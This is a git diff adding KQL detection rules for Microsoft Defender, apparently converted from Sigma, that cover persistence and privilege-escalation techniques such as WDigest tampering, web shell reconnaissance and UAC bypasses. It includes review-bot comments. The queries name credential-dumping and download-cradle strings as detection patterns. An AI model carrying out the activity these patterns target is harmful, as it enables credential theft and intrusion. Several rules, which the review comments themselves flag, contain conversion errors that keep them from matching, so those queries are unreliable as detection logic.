@@ -0,0 +1,12 @@ +// Title: Uncommon Extension Shim Database Installation Via Sdbinst.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-01 +// Level: medium +// Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. +Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011 + +DeviceProcessEvents +| where (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe") and (not((ProcessCommandLine =~ "" or ProcessCommandLine contains ".sdb" or ((ProcessCommandLine endswith " -c" or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " -mm" or ProcessCommandLine endswith " -t") or ProcessCommandLine contains " -m -bg") or isnull(ProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql b/KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql new file mode 100644 index 00000000..b59815c2 --- /dev/null +++ b/KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql 
@@ -0,0 +1,12 @@ +// Title: Uncommon Microsoft Office Trusted Location Added +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-21 +// Level: high +// Description: Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Other unknown legitimate or custom paths need to be filtered to avoid false positives + +DeviceRegistryEvents +| where (RegistryKey contains "Security\\Trusted Locations\\Location" and RegistryKey endswith "\\Path") and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe")))) and (not((RegistryValueData contains "%APPDATA%\\Microsoft\\Templates" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Templates" or RegistryValueData contains "%APPDATA%\\Microsoft\\Word\\Startup" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Word\\Startup" or RegistryValueData contains ":\\Program Files (x86)\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office (x86)\\Templates" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\Templates\\"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql b/KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql new file mode 100644 index 00000000..3365d1b6 --- /dev/null 
+++ b/KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql @@ -0,0 +1,12 @@ +// Title: Unsigned AppX Installation Attempt Using Add-AppxPackage +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-31 +// Level: medium +// Description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion +// False Positives: +// - Installation of unsigned packages for testing purposes + +DeviceProcessEvents +| where (ProcessCommandLine contains "Add-AppPackage " or ProcessCommandLine contains "Add-AppxPackage ") and ProcessCommandLine contains " -AllowUnsigned" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql b/KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql new file mode 100644 index 00000000..f7232a32 --- /dev/null +++ b/KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql @@ -0,0 +1,10 @@ +// Title: Unusual Child Process of dns.exe +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-27 +// Level: high +// Description: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.initial-access, attack.t1133 + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\conhost.exe")) \ No newline at end of file diff --git a/KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql b/KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql new file mode 100644 index 00000000..99b3535d --- /dev/null 
+++ b/KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql
@@ -0,0 +1,10 @@
+// Title: Unusual File Deletion by Dns.exe
+// Author: Tim Rauch (Nextron Systems), Elastic (idea)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql b/KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql
new file mode 100644
index 00000000..14db39a0
--- /dev/null
+++ b/KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql
@@ -0,0 +1,10 @@
+// Title: Unusual File Modification by dns.exe
+// Author: Tim Rauch (Nextron Systems), Elastic (idea)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql b/KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql
new file mode 100644
index 00000000..51f4164f
--- /dev/null
+++ b/KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql
@@ -0,0 +1,12 @@ +// Title: User Added To Admin Group Via Dscl +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-03-19 +// Level: medium +// Description: Detects attempts to create and add an account to the admin group via "dscl" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains " -append " and ProcessCommandLine contains " /Groups/admin " and ProcessCommandLine contains " GroupMembership ") and FolderPath endswith "/dscl" \ No newline at end of file diff --git a/KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql b/KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql new file mode 100644 index 00000000..74d485a9 --- /dev/null +++ b/KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql @@ -0,0 +1,12 @@ +// Title: User Added To Admin Group Via DseditGroup +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-08-22 +// Level: medium +// Description: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains " -o edit " and ProcessCommandLine contains " -a " and ProcessCommandLine contains " -t user" and ProcessCommandLine contains "admin") and FolderPath endswith "/dseditgroup" \ No newline at end of file diff --git a/KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql b/KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql new file mode 100644 index 00000000..a3602473 --- /dev/null +++ b/KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql 
@@ -0,0 +1,12 @@ +// Title: User Added To Admin Group Via Sysadminctl +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-03-19 +// Level: medium +// Description: Detects attempts to create and add an account to the admin group via "sysadminctl" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains " -addUser " and ProcessCommandLine contains " -admin ") and FolderPath endswith "/sysadminctl" \ No newline at end of file diff --git a/KQL/rules/Persistence/vscode_powershell_profile_modification.kql b/KQL/rules/Persistence/vscode_powershell_profile_modification.kql new file mode 100644 index 00000000..c6371aa8 --- /dev/null +++ b/KQL/rules/Persistence/vscode_powershell_profile_modification.kql @@ -0,0 +1,12 @@ +// Title: VsCode Powershell Profile Modification +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-24 +// Level: medium +// Description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.013 +// False Positives: +// - Legitimate use of the profile by developers or administrators + +DeviceFileEvents +| where FolderPath endswith "\\Microsoft.VSCode_profile.ps1" \ No newline at end of file diff --git a/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql b/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql new file mode 100644 index 00000000..d6174c64 --- /dev/null +++ b/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql 
@@ -0,0 +1,13 @@
+// Title: Wdigest CredGuard Registry Modification
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2019-08-25
+// Level: high
+// Description: Detects potential malicious modification of the property value of IsCredGuardEnabled from
+HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system.
+This is usually used with UseLogonCredential to manipulate the caching credentials.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\IsCredGuardEnabled"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql b/KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql
new file mode 100644
index 00000000..9b1e6ee7
--- /dev/null
+++ b/KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql
@@ -0,0 +1,10 @@
+// Title: Wdigest Enable UseLogonCredential
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2019-09-12
+// Level: high
+// Description: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "WDigest\\UseLogonCredential"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql b/KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql
new file mode 100644
index 00000000..ff9af79d
--- /dev/null
+++ b/KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql
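Review bot: `RegistryValueData =~ "DWORD (0x00000001)"` in the UseLogonCredential rule carries the Sysmon `Details` formatting into an MDE table; in `DeviceRegistryEvents` a REG_DWORD value is, as far as I can tell, reported as its decimal string (`1`), so this rule would never match — confirm against live data before relying on it. The check should read `| where RegistryValueData == "1" and RegistryKey endswith "WDigest\\UseLogonCredential"`. The same Sysmon literals appear later in this patch in the "Winlogon AllowMultipleTSSessions Enable" rule (`endswith "DWORD (0x00000001)"`), in the "Atbroker Registry Change" and "Bypass UAC Using DelegateExecute" rules (`"(Empty)"`) and in the "Bypass UAC Using Event Viewer" rule (`\\(Default)` appended to the key), none of which MDE emits in that form to my knowledge; the converter needs a value-format mapping for these fields.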
@@ -0,0 +1,10 @@ +// Title: Webshell Detection With Command Line Keywords +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community, Chad Hudson, Matt Anderson +// Date: 2017-01-01 +// Level: high +// Description: Detects certain command line parameters often used during reconnaissance activity via web shells +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087 + +DeviceProcessEvents +| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "cd /d ") or ((FolderPath endswith "\\dsquery.exe" or FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\pathping.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\tracert.exe" or FolderPath endswith "\\ver.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\whoami.exe") or (ProcessVersionInfoOriginalFileName in~ 
("dsquery.exe", "find.exe", "findstr.exe", "ipconfig.exe", "netstat.exe", "nslookup.exe", "pathping.exe", "quser.exe", "schtasks.exe", "sysinfo.exe", "tasklist.exe", "tracert.exe", "ver.exe", "VSSADMIN.EXE", "wevtutil.exe", "whoami.exe"))) or (ProcessCommandLine contains " Test-NetConnection " or ProcessCommandLine contains "dir \\") or ((ProcessCommandLine contains " user " or ProcessCommandLine contains " use " or ProcessCommandLine contains " group ") and (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) or (ProcessCommandLine contains " -n " and ProcessVersionInfoOriginalFileName =~ "ping.exe") or ((ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains " -windowstyle hidden" or ProcessCommandLine contains ".WebClient).Download") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains " /node:" and ProcessVersionInfoOriginalFileName =~ "wmic.exe")) \ No newline at end of file diff --git a/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql b/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql new file mode 100644 index 00000000..f3b27cb8 --- /dev/null +++ b/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql 
@@ -0,0 +1,13 @@ +// Title: Webshell Hacking Activity Patterns +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-17 +// Level: high +// Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "comsvcs") or (ProcessCommandLine contains " -hp" and ProcessCommandLine contains " a " and ProcessCommandLine contains " -m") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " user " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " localgroup " and ProcessCommandLine contains " administrators " and ProcessCommandLine contains "/add") or (FolderPath endswith "\\ntdsutil.exe" or FolderPath endswith "\\ldifde.exe" or FolderPath endswith "\\adfind.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\Nanodump.exe" or 
FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\fsutil.exe") or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains " sekurlsa" or ProcessCommandLine contains ".dmp full" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "process call create" or ProcessCommandLine contains "reg save " or ProcessCommandLine contains "whoami /priv")) \ No newline at end of file diff --git a/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql b/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql new file mode 100644 index 00000000..f94bdfd8 --- /dev/null +++ b/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql 
@@ -0,0 +1,11 @@ +// Title: Webshell Tool Reconnaissance Activity +// Author: Cian Heasley, Florian Roth (Nextron Systems) +// Date: 2020-07-22 +// Level: high +// Description: Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.003 + +DeviceProcessEvents +| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "CATALINA_HOME" or ProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and (ProcessCommandLine contains "perl --help" or ProcessCommandLine contains "perl -h" or ProcessCommandLine contains "python --help" or ProcessCommandLine contains "python -h" or ProcessCommandLine contains "python3 --help" or ProcessCommandLine contains "python3 -h" or ProcessCommandLine contains "wget --help") \ No newline at end of file diff --git a/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql b/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql new file mode 100644 index 00000000..14eacb11 --- /dev/null +++ b/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql 
@@ -0,0 +1,15 @@ +// Title: Winlogon AllowMultipleTSSessions Enable +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-09 +// Level: medium +// Description: Detects when the 'AllowMultipleTSSessions' value is enabled. +Which allows for multiple Remote Desktop connection sessions to be opened at once. +This is often used by attacker as a way to connect to an RDP session without disconnecting the other users + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate use of the multi session functionality + +DeviceRegistryEvents +| where RegistryValueData endswith "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions" \ No newline at end of file diff --git a/KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql b/KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql new file mode 100644 index 00000000..079f9503 --- /dev/null +++ b/KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql @@ -0,0 +1,13 @@ +// Title: WMI Persistence - Script Event Consumer +// Author: Thomas Patzke +// Date: 2018-03-07 +// Level: medium +// Description: Detects WMI script event consumers +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.003 +// False Positives: +// - Legitimate event consumers +// - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button + +DeviceProcessEvents +| where FolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/wmi_persistence_security.kql b/KQL/rules/Persistence/wmi_persistence_security.kql new file mode 100644 index 00000000..2deec1c8 --- /dev/null 
+++ b/KQL/rules/Persistence/wmi_persistence_security.kql
@@ -0,0 +1,12 @@
+// Title: WMI Persistence - Security
+// Author: Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community
+// Date: 2017-08-22
+// Level: medium
+// Description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.003
+// False Positives:
+// - Unknown (data set is too small; further testing needed)
+
+DeviceRegistryEvents
+| where RegistryKey contains "subscription"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql b/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql
new file mode 100644
index 00000000..fca1812a
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql
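Review bot: `DeviceRegistryEvents | where RegistryKey contains "subscription"` does not implement what the description states: the rule is built on WMI-Activity and Security event logs, and permanent WMI event subscriptions live in the WMI repository rather than the registry, so this query misses the activity it names and will match any unrelated key whose path happens to contain "subscription". If the converter cannot map the source log to an MDE table, the rule should be left out of the generated set instead of shipped in this form. A closer MDE equivalent, if the action type is available in your tenant, is the dedicated filter-to-consumer binding event, e.g. `DeviceEvents | where ActionType == "WmiBindEventFilterToConsumer"`.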
@@ -0,0 +1,12 @@
+// Title: Add Port Monitor Persistence in Registry
+// Author: frack113
+// Date: 2021-12-30
+// Level: medium
+// Description: Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.
+A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010
+
+DeviceRegistryEvents
+| where (RegistryValueData endswith ".dll" and RegistryKey endswith "\\Control\\Print\\Monitors*") and (not(((RegistryValueData =~ "cpwmon64_v40.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Control\\Print\\Monitors\\CutePDF Writer Monitor v4.0\\Driver" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or RegistryKey contains "\\Control\\Print\\Monitors\\MONVNC\\Driver" or (RegistryKey endswith "Control\\Print\\Environments*" and RegistryKey endswith "\\Drivers*" and RegistryKey contains "\\VNC Printer"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql
new file mode 100644
index 00000000..9f38fa73
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql
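Review bot: `RegistryKey endswith "\\Control\\Print\\Monitors*"` keeps the Sigma trailing wildcard as a literal asterisk, so the selection only matches keys that actually end in `*` and the rule is effectively dead; the exclusion has the same problem in `endswith "Control\\Print\\Environments*"` and `endswith "\\Drivers*"`. An `endswith` whose operand ends in a wildcard should be emitted as `contains`: `RegistryKey contains "\\Control\\Print\\Monitors\\"` for the selection, and `RegistryKey contains "Control\\Print\\Environments\\" and RegistryKey contains "\\Drivers\\"` in the exclusion. It is worth scanning the rest of the generated rules for `endswith`/`startswith` operands that still contain `*`.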
@@ -0,0 +1,10 @@ +// Title: Allow Service Access Using Security Descriptor Tampering Via Sc.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-28 +// Level: high +// Description: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003 + +DeviceProcessEvents +| where ((FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "A;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD")) and (not(InitiatingProcessFolderPath =~ "C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/atbroker_registry_change.kql b/KQL/rules/Privilege Escalation/atbroker_registry_change.kql new file mode 100644 index 00000000..b7df7feb --- /dev/null +++ b/KQL/rules/Privilege Escalation/atbroker_registry_change.kql 
@@ -0,0 +1,12 @@ +// Title: Atbroker Registry Change +// Author: Mateusz Wydra, oscd.community +// Date: 2020-10-13 +// Level: medium +// Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at' +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1218, attack.persistence, attack.t1547 +// False Positives: +// - Creation of non-default, legitimate at usage + +DeviceRegistryEvents +| where (RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs" or RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") and (not(((RegistryValueData =~ "(Empty)" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\atbroker.exe" and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql b/KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql new file mode 100644 index 00000000..6a8ba99c --- /dev/null +++ b/KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql @@ -0,0 +1,10 @@ +// Title: Bypass UAC Using DelegateExecute +// Author: frack113 +// Date: 2022-01-05 +// Level: high +// Description: Bypasses User Account Control using a fileless method +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 + +DeviceRegistryEvents +| where RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\open\\command\\DelegateExecute" \ No newline at end of file 
diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql b/KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql
new file mode 100644
index 00000000..0ba67225
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql
@@ -0,0 +1,10 @@
+// Title: Bypass UAC Using Event Viewer
+// Author: frack113
+// Date: 2022-01-05
+// Level: high
+// Description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010
+
+DeviceRegistryEvents
+| where RegistryKey endswith "_Classes\\mscfile\\shell\\open\\command\\(Default)" and (not(RegistryValueData startswith "%SystemRoot%\\system32\\mmc.exe \"%1\" %"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql b/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql
new file mode 100644
index 00000000..6a19b8be
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql
@@ -0,0 +1,13 @@
+// Title: Bypass UAC Using SilentCleanup Task
+// Author: frack113, Nextron Systems
+// Date: 2022-01-06
+// Level: high
+// Description: Detects the setting of the environement variable "windir" to a non default value.
+Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task.
+The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Environment\\windir" and (not(RegistryValueData =~ "%SystemRoot%"))
\ No newline at end of file
